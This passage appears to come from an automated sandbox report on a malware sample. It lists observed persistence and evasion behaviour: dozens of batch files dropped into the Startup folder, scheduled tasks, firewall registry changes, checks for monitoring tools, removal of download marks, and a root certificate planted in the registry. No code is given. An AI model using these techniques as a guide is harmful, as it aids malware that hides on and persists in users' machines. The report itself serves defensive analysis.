Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\66nsVpLcdQEIzffvQGAD01Wx.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mzNuu3a0I49mMXBViscfANRg.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a0N7wfHYhrlqZ4SvtOhtcxTC.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\P8Y5HAG12fYTb8t4PcK7rKlv.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\70kdhy3RjJy5GS3eqVG34cMz.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7n1DOJlzDKyVx2HRsxGMDCQe.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\63M9nLrRjxludNRrfdaZddPt.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vD42lBWTRgzN6MsiYDmXUaxN.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LPtepEDzI9Rnp2fhv2mNTraW.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GCxOPoVfvPyhMjrPUVz65iw0.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fp4XGOFNreU9QQvFxWGD280g.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PFtTOLsGyXAF8UN7SK2yoXrT.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yx7mEUrFnFwXRMEpkyGWl1Pr.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b5QOFtze6kWQIzQsICnW3Y23.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HtVik0gCCXpMbW1ewQEIafJO.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vtoFw8ASSHe6FVnWEsT9Qpir.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JA9IiDRirqHyvko4OfQivGZ7.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3r3iI3aD5uoVkmnpNwglczar.bat	Jump to dropped file

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xInHqHgRkuPGfp5esHw9Po4t.bat

Jump to behavior

Creates job files (autostart)

Source: C:\Windows\SysWOW64\schtasks.exe

File created: C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job

Creates or modifies windows services

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules

Modifies existing windows services

Source: C:\Windows\System32\svchost.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config

Stores files to the Windows start menu directory

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xInHqHgRkuPGfp5esHw9Po4t.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uM7NrUar2CHMPPLhTaEGJaiv.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9KovXimwlIyW3P77uFXo41ye.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BsDz5LTErOmd8yNfyBTmMVUZ.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WfwAozSpYoRh0VfEDamYiBsR.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4lG8OjDaPfGRBHmxDRRVnuFX.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LD4hNojEUEziyKrYgWhQk5rm.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\w7u98nz6M4xUaPLHp2FQ8cKh.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QiP2pWLr6NBQvOLbwQTTyn6C.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BWeUEkKv96FAORobAHCW6ypF.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OiFswMERSIM5QYpzdzXs8HqN.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\70kdhy3RjJy5GS3eqVG34cMz.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vD42lBWTRgzN6MsiYDmXUaxN.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JA9IiDRirqHyvko4OfQivGZ7.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tEJmB2nPjyQy45rj4ea5hhl3.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsh82zoYXoBpPEndu5XVvQbj.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mttZ30v22cES8SbTv1OgQiYx.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ixTCqmFJu5C2WAuYjLa75esH.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xsGva5E6VHjdUQqf5f96rHfC.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2zxQMcxXAdjZW6YdcXWRkkOC.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7TQPiLaiOp4J0vvxRaQJgnEq.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8acF06oTPket8RN9OHo9AhQC.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\txcp0mnex1Rnt92zIdFfbI0y.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\YnNYj3NsWtyv1mUxqNvcXDCG.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NF17SuJC2X4gjmjhKys98Qxu.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wgc7DyRQRZGZ91fWhoYDAYbz.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u4NTnGOUpjOPuN9Xvi5JMQBJ.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N7uBTIqAI4TFaoTgWHqBwwXI.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\66nsVpLcdQEIzffvQGAD01Wx.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mzNuu3a0I49mMXBViscfANRg.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a0N7wfHYhrlqZ4SvtOhtcxTC.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\P8Y5HAG12fYTb8t4PcK7rKlv.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7n1DOJlzDKyVx2HRsxGMDCQe.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\63M9nLrRjxludNRrfdaZddPt.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LPtepEDzI9Rnp2fhv2mNTraW.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GCxOPoVfvPyhMjrPUVz65iw0.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fp4XGOFNreU9QQvFxWGD280g.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PFtTOLsGyXAF8UN7SK2yoXrT.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yx7mEUrFnFwXRMEpkyGWl1Pr.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b5QOFtze6kWQIzQsICnW3Y23.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HtVik0gCCXpMbW1ewQEIafJO.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vtoFw8ASSHe6FVnWEsT9Qpir.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3r3iI3aD5uoVkmnpNwglczar.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CpI1BxUwX4GXv0UQgqj98YFq.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dH9ICyXokcwnq5IDiow3vkKB.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1Ub2k1IJ2t5gUNZveaJnsLim.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lfz7DVXioZ89NNQKMlyzk5D1.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TH2edQjI5N96cctLqxcxRWB4.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lRYDXj1XORWa1yGwgqL1xUtR.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Gov6rjgDZRJhjjWExECEmd4R.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fDdDwjmSMhosQx3rLX3Nv89G.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tYY0jrXY77oGwO5gH1VTslTu.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bzhtqiaIEnooSzQ58KPkDsXr.bat	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\hvfsedh:Zone.Identifier read attributes | delete

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Stores large binary data to the registry

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 Blob

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
